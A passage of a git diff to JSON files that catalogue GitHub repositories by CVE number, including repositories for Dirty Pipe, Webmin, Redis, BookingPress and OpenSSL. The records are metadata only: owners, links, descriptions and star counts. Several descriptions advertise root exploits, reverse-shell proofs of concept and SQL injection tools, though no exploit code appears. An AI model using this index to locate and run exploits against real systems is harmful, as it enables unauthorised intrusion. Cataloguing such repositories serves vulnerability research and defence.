"forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0529.json b/2022/CVE-2022-0529.json new file mode 100644 index 0000000000..6d7f395cc1 --- /dev/null +++ b/2022/CVE-2022-0529.json @@ -0,0 +1,64 @@ +[ + { + "id": 464348331, + "name": "unzip_poc", + "full_name": "nanaao\/unzip_poc", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/unzip_poc", + "description": "CVE-2022-0529 & CVE-2022-0530", + "fork": false, + "created_at": "2022-02-28T05:20:03Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-28T05:10:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 464353991, + "name": "unzip_poc", + "full_name": "ByteHackr\/unzip_poc", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/unzip_poc", + "description": "CVE-2022-0529 & CVE-2022-0530", + "fork": false, + "created_at": "2022-02-28T05:44:52Z", + "updated_at": "2024-08-12T20:21:04Z", + "pushed_at": "2022-02-28T06:01:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0543.json b/2022/CVE-2022-0543.json index 23c357b580..45555ea6de 100644 --- a/2022/CVE-2022-0543.json +++ b/2022/CVE-2022-0543.json @@ -29,5 +29,98 @@ "watchers": 88, "score": 0, "subscribers_count": 1 + }, + { + "id": 510988944, + "name": "CVE-2022-0543", + "full_name": "z92g\/CVE-2022-0543", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-0543", + "description": "Redis 沙盒逃逸(CVE-2022-0543)POC&EXP", + "fork": false, + "created_at": "2022-07-06T04:35:59Z", + "updated_at": "2024-11-16T19:50:34Z", + "pushed_at": "2022-07-23T14:21:14Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 531605589, + "name": "CVE-2022-0543", + "full_name": "JacobEbben\/CVE-2022-0543", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-0543", + "description": "Redis RCE through Lua Sandbox Escape vulnerability", + "fork": false, + "created_at": "2022-09-01T16:44:56Z", + "updated_at": "2024-06-04T09:59:22Z", + "pushed_at": "2022-09-02T22:46:08Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 638780954, + "name": "redisHack", + "full_name": "SiennaSkies\/redisHack", + "owner": { + "login": "SiennaSkies", + "id": 105592340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105592340?v=4", + "html_url": "https:\/\/github.com\/SiennaSkies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SiennaSkies\/redisHack", + "description": "redis未授权、redis_CVE-2022-0543检测利用二合一脚本", + "fork": false, + "created_at": "2023-05-10T05:05:31Z", + "updated_at": "2024-12-08T15:52:10Z", + "pushed_at": "2023-05-11T09:23:28Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0591.json b/2022/CVE-2022-0591.json new file mode 100644 index 0000000000..d75e418e44 --- /dev/null +++ b/2022/CVE-2022-0591.json @@ -0,0 +1,40 @@ +[ + { + "id": 688625677, + "name": "FC3er", + "full_name": "im-hanzou\/FC3er", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/FC3er", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-0591 - Formcraft3 < 3.8.28 - Unauthenticated SSRF", + "fork": false, + "created_at": "2023-09-07T18:41:43Z", + "updated_at": "2024-11-21T14:54:22Z", + "pushed_at": "2023-09-07T19:57:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2022-0591", + "formcraft", + "formcraft3", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0666.json b/2022/CVE-2022-0666.json new file mode 100644 index 0000000000..1940e714c3 --- /dev/null +++ b/2022/CVE-2022-0666.json @@ -0,0 +1,33 @@ +[ + { + "id": 516692900, + "name": "CVE-2022-0666", + "full_name": "keyboardancer\/CVE-2022-0666", + "owner": { + "login": "keyboardancer", + "id": 25246722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25246722?v=4", + "html_url": "https:\/\/github.com\/keyboardancer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyboardancer\/CVE-2022-0666", + "description": null, + "fork": false, + "created_at": "2022-07-22T09:38:20Z", + "updated_at": "2022-07-22T09:38:20Z", + "pushed_at": "2022-07-22T09:38:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0725.json b/2022/CVE-2022-0725.json new file mode 100644 index 0000000000..f3c329336d --- /dev/null +++ b/2022/CVE-2022-0725.json @@ -0,0 +1,33 @@ +[ + { + "id": 464371159, + "name": "keepass_poc", + "full_name": "ByteHackr\/keepass_poc", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/keepass_poc", + "description": "POC for KeePass [CVE-2022-0725]", + "fork": false, + "created_at": "2022-02-28T06:53:37Z", + "updated_at": "2025-01-04T05:44:44Z", + "pushed_at": "2022-03-12T14:31:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0739.json b/2022/CVE-2022-0739.json new file mode 100644 index 0000000000..cba5da93a6 --- /dev/null +++ b/2022/CVE-2022-0739.json @@ -0,0 +1,255 @@ +[ + { + "id": 559657593, + "name": "CVE-2022-0739", + "full_name": "destr4ct\/CVE-2022-0739", + "owner": { + "login": "destr4ct", + "id": 77569644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77569644?v=4", + "html_url": "https:\/\/github.com\/destr4ct", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/destr4ct\/CVE-2022-0739", + "description": "Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)", + "fork": false, + "created_at": "2022-10-30T19:32:15Z", + "updated_at": "2024-01-31T11:11:54Z", + "pushed_at": "2022-10-30T19:38:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560664356, + "name": "CVE-2022-0739", + "full_name": "Chris01s\/CVE-2022-0739", + "owner": { + "login": "Chris01s", + "id": 31475621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31475621?v=4", + "html_url": "https:\/\/github.com\/Chris01s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chris01s\/CVE-2022-0739", + "description": "Simple bash script to automate the exploit of cve 2022 0739", + "fork": false, + "created_at": "2022-11-02T01:39:37Z", + "updated_at": "2024-08-12T20:28:08Z", + "pushed_at": "2022-11-02T02:18:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573647044, + "name": "CVE-2022-0739", + "full_name": "BKreisel\/CVE-2022-0739", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-0739", + "description": "🐍 Python Exploit for CVE-2022-0739", + "fork": false, + "created_at": "2022-12-03T01:33:07Z", + "updated_at": "2023-12-27T12:18:10Z", + "pushed_at": "2022-12-09T18:01:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0739", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 577585825, + "name": "wp_bookingpress_1.0.11", + "full_name": "hadrian3689\/wp_bookingpress_1.0.11", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/wp_bookingpress_1.0.11", + "description": "CVE-2022-0739 Wordpress BookingPress SQLi", + "fork": false, + "created_at": "2022-12-13T04:04:46Z", + "updated_at": "2023-07-06T21:54:38Z", + "pushed_at": "2022-12-13T16:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581412484, + "name": "CVE-2022-0739", + "full_name": "G01d3nW01f\/CVE-2022-0739", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2022-0739", + "description": null, + "fork": false, + "created_at": "2022-12-23T05:35:08Z", + "updated_at": "2022-12-23T05:36:55Z", + "pushed_at": "2022-12-23T05:36:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586035039, + "name": "CVE-2022-0739", + "full_name": "viardant\/CVE-2022-0739", + "owner": { + "login": "viardant", + "id": 84291326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84291326?v=4", + "html_url": "https:\/\/github.com\/viardant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viardant\/CVE-2022-0739", + "description": "Exploit for WP BookingPress (< 1.0.11) based on destr4ct POC.", + "fork": false, + "created_at": "2023-01-06T19:07:11Z", + "updated_at": "2024-07-19T10:23:33Z", + "pushed_at": "2023-01-17T16:02:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603458874, + "name": "CVE-2022-0739", + "full_name": "ElGanz0\/CVE-2022-0739", + "owner": { + "login": "ElGanz0", + "id": 103381132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103381132?v=4", + "html_url": "https:\/\/github.com\/ElGanz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ElGanz0\/CVE-2022-0739", + "description": "BookingPress < 1.0.11 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2023-02-18T15:23:49Z", + "updated_at": "2023-02-18T15:24:59Z", + "pushed_at": "2023-02-23T21:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616018302, + "name": "Bash-exploit-for-CVE-2022-0739", + "full_name": "lhamouche\/Bash-exploit-for-CVE-2022-0739", + "owner": { + "login": "lhamouche", + "id": 125658579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125658579?v=4", + "html_url": "https:\/\/github.com\/lhamouche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lhamouche\/Bash-exploit-for-CVE-2022-0739", + "description": null, + "fork": false, + "created_at": "2023-03-19T11:35:03Z", + "updated_at": "2023-09-18T18:30:15Z", + "pushed_at": "2023-03-23T08:20:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0778.json b/2022/CVE-2022-0778.json index 1776938143..c7d495f76d 100644 --- a/2022/CVE-2022-0778.json +++ b/2022/CVE-2022-0778.json @@ -1,4 +1,35 @@ [ + { + "id": 470297034, + "name": "CVE-2022-0778", + "full_name": "drago-96\/CVE-2022-0778", + "owner": { + "login": "drago-96", + "id": 22937313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22937313?v=4", + "html_url": "https:\/\/github.com\/drago-96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drago-96\/CVE-2022-0778", + "description": "Proof of concept for CVE-2022-0778, which triggers an infinite loop in parsing X.509 certificates due to a bug in BN_mod_sqrt", + "fork": false, + "created_at": "2022-03-15T19:06:33Z", + "updated_at": "2024-11-21T13:26:19Z", + "pushed_at": "2022-04-03T15:07:31Z", + "stargazers_count": 183, + "watchers_count": 183, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 183, + "score": 0, + "subscribers_count": 17 + }, { "id": 477818601, "name": "cve-2022-0778", @@ -97,5 +128,98 @@ "watchers": 2, "score": 0, "subscribers_count": 1 + }, + { + "id": 689922616, + "name": "openssl-1.1.1g_CVE-2022-0778", + "full_name": "Trinadh465\/openssl-1.1.1g_CVE-2022-0778", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/openssl-1.1.1g_CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2023-09-11T07:30:33Z", + "updated_at": "2023-09-11T07:33:47Z", + "pushed_at": "2023-09-11T07:34:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710128947, + "name": "CVE-2022-0778", + "full_name": "jeongjunsoo\/CVE-2022-0778", + "owner": { + "login": "jeongjunsoo", + "id": 75816093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75816093?v=4", + "html_url": "https:\/\/github.com\/jeongjunsoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeongjunsoo\/CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2023-10-26T04:39:44Z", + "updated_at": "2023-10-26T04:39:44Z", + "pushed_at": "2023-10-26T07:09:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773788494, + "name": "OpenSSL_1.0.1g_CVE-2022-0778", + "full_name": "hshivhare67\/OpenSSL_1.0.1g_CVE-2022-0778", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/OpenSSL_1.0.1g_CVE-2022-0778", + "description": null, + "fork": false, + "created_at": "2024-03-18T12:00:39Z", + "updated_at": "2024-03-18T12:02:10Z", + "pushed_at": "2024-03-18T12:02:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0811.json b/2022/CVE-2022-0811.json new file mode 100644 index 0000000000..0ce0cfdfc7 --- /dev/null +++ b/2022/CVE-2022-0811.json @@ -0,0 +1,33 @@ +[ + { + "id": 472271080, + "name": "webhook-cve-2022-0811", + "full_name": "spiarh\/webhook-cve-2022-0811", + "owner": { + "login": "spiarh", + "id": 33934779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33934779?v=4", + "html_url": "https:\/\/github.com\/spiarh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spiarh\/webhook-cve-2022-0811", + "description": "Simple webhook to block exploitation of CVE-2022-0811", + "fork": false, + "created_at": "2022-03-21T09:39:22Z", + "updated_at": "2024-08-12T20:21:44Z", + "pushed_at": "2022-03-21T09:58:35Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0824.json b/2022/CVE-2022-0824.json index 316c9f5e2f..147946a044 100644 --- a/2022/CVE-2022-0824.json +++ b/2022/CVE-2022-0824.json @@ -1,4 +1,40 @@ [ + { + "id": 466595745, + "name": "Webmin-CVE-2022-0824-revshell", + "full_name": "faisalfs10x\/Webmin-CVE-2022-0824-revshell", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/Webmin-CVE-2022-0824-revshell", + "description": "Webmin <=1.984, CVE-2022-0824 Post-Auth Reverse Shell PoC", + "fork": false, + "created_at": "2022-03-06T00:03:31Z", + "updated_at": "2025-01-03T12:07:53Z", + "pushed_at": "2022-03-06T07:01:15Z", + "stargazers_count": 111, + "watchers_count": 111, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 38, + "watchers": 111, + "score": 0, + "subscribers_count": 4 + }, { "id": 472606012, "name": "CVE-2022-0824", @@ -34,5 +70,73 @@ "watchers": 4, "score": 0, "subscribers_count": 1 + }, + { + "id": 552892049, + "name": "golang-webmin-CVE-2022-0824-revshell", + "full_name": "pizza-power\/golang-webmin-CVE-2022-0824-revshell", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/golang-webmin-CVE-2022-0824-revshell", + "description": "Exploit POC for CVE-2022-0824", + "fork": false, + "created_at": "2022-10-17T11:47:04Z", + "updated_at": "2022-10-18T03:27:54Z", + "pushed_at": "2022-10-17T13:56:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563421791, + "name": "WebminRCE-exploit", + "full_name": "gokul-ramesh\/WebminRCE-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/WebminRCE-exploit", + "description": "CVE-2022-0824, CVE-2022-0829, File Manger privilege exploit", + "fork": false, + "created_at": "2022-11-08T15:22:55Z", + "updated_at": "2022-12-12T05:03:39Z", + "pushed_at": "2022-11-18T15:29:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0824", + "cve-2022-0829", + "exploit", + "webmin-rce", + "webmin-reverse-shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0847.json b/2022/CVE-2022-0847.json index c6eef12e3b..593011117e 100644 --- a/2022/CVE-2022-0847.json +++ b/2022/CVE-2022-0847.json @@ -1,4 +1,66 @@ [ + { + "id": 467159035, + "name": "CVE-2022-0847", + "full_name": "bbaranoff\/CVE-2022-0847", + "owner": { + "login": "bbaranoff", + "id": 37385191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37385191?v=4", + "html_url": "https:\/\/github.com\/bbaranoff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bbaranoff\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-07T15:50:18Z", + "updated_at": "2024-09-08T18:02:33Z", + "pushed_at": "2022-03-07T15:52:23Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467200755, + "name": "CVE-2022-0847", + "full_name": "xndpxs\/CVE-2022-0847", + "owner": { + "login": "xndpxs", + "id": 62086766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62086766?v=4", + "html_url": "https:\/\/github.com\/xndpxs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xndpxs\/CVE-2022-0847", + "description": "Vulnerability in the Linux kernel since 5.8", + "fork": false, + "created_at": "2022-03-07T17:51:02Z", + "updated_at": "2024-02-01T01:45:36Z", + "pushed_at": "2022-03-07T17:59:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, { "id": 467215742, "name": "CVE-2022-0847", @@ -30,6 +92,440 @@ "score": 0, "subscribers_count": 4 }, + { + "id": 467221382, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "Arinerron\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "Arinerron", + "id": 3926753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3926753?v=4", + "html_url": "https:\/\/github.com\/Arinerron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arinerron\/CVE-2022-0847-DirtyPipe-Exploit", + "description": "A root exploit for CVE-2022-0847 (Dirty Pipe)", + "fork": false, + "created_at": "2022-03-07T18:55:20Z", + "updated_at": "2025-01-06T05:11:29Z", + "pushed_at": "2022-03-08T06:20:05Z", + "stargazers_count": 1092, + "watchers_count": 1092, + "has_discussions": false, + "forks_count": 220, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 220, + "watchers": 1092, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 467257098, + "name": "Dirty-Pipe", + "full_name": "crowsec-edtech\/Dirty-Pipe", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/Dirty-Pipe", + "description": "CVE-2022-0847 exploit one liner", + "fork": false, + "created_at": "2022-03-07T20:57:34Z", + "updated_at": "2022-12-09T22:58:15Z", + "pushed_at": "2022-03-07T21:01:15Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467317090, + "name": "CVE-2022-0847", + "full_name": "lucksec\/CVE-2022-0847", + "owner": { + "login": "lucksec", + "id": 59011386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59011386?v=4", + "html_url": "https:\/\/github.com\/lucksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucksec\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-08T01:17:09Z", + "updated_at": "2022-12-26T10:39:25Z", + "pushed_at": "2022-03-08T01:50:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467367761, + "name": "CVE-2022-0847", + "full_name": "si1ent-le\/CVE-2022-0847", + "owner": { + "login": "si1ent-le", + "id": 56815669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56815669?v=4", + "html_url": "https:\/\/github.com\/si1ent-le", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/si1ent-le\/CVE-2022-0847", + "description": "CVE-2022-0487", + "fork": false, + "created_at": "2022-03-08T04:51:02Z", + "updated_at": "2022-03-08T05:15:14Z", + "pushed_at": "2022-03-08T05:18:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467411192, + "name": "cve-2022-0847dirtypipe-exploit", + "full_name": "bohr777\/cve-2022-0847dirtypipe-exploit", + "owner": { + "login": "bohr777", + "id": 56676965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56676965?v=4", + "html_url": "https:\/\/github.com\/bohr777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bohr777\/cve-2022-0847dirtypipe-exploit", + "description": null, + "fork": false, + "created_at": "2022-03-08T07:42:31Z", + "updated_at": "2023-11-18T03:11:10Z", + "pushed_at": "2022-03-08T05:18:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467439184, + "name": "CVE-2022-0847", + "full_name": "ZZ-SOCMAP\/CVE-2022-0847", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": 